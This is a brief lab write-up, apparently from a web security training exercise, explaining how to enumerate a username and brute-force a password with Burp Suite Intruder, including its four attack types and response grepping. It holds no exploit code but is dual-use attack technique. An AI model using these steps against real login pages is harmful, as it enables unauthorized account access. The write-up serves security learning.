long time no see
This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:
To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
- Open the web page using the browser included in Burp Suite and find the corresponding HTTP request. In this challenge, the target is
POST /login.
- Select the request and send it to Intruder by ctrl+I.
- (“Positions” tab) Choose one of the four attack types
- One set of payload, one or more payload positions
- Sniper: Places each payload into the first position, then the second position, and so on.
- Battering Ram: Places each payload into all positions.
- Multiple sets of payload, different payload sets for different payload positions
- Pitchfork: Iterates through all payload sets simultaneously.
- Cluster Bomb: All permutations of payload combinations are tested.
- One set of payload, one or more payload positions
- (“Positions” tab) Set payload positions by marking the position in the base request. In this challenge, we are bruteforcing
usernamefirst.
- (“Payload” tab) Paste the payload.
- (“Settings” tab) If you want to extract extra data from response, you can checkout “Grep - Extract”. In this challenge, we are guessing that the “Invalid username” prompt will change to something else if we guess the username correctly.
- Start the attack! There will be a popup window showing the results of the attack. And… yeah, we find something different.
This covers the basic usage of Burp Intruder. Now we know the correct username, we can brute force the password again and get in!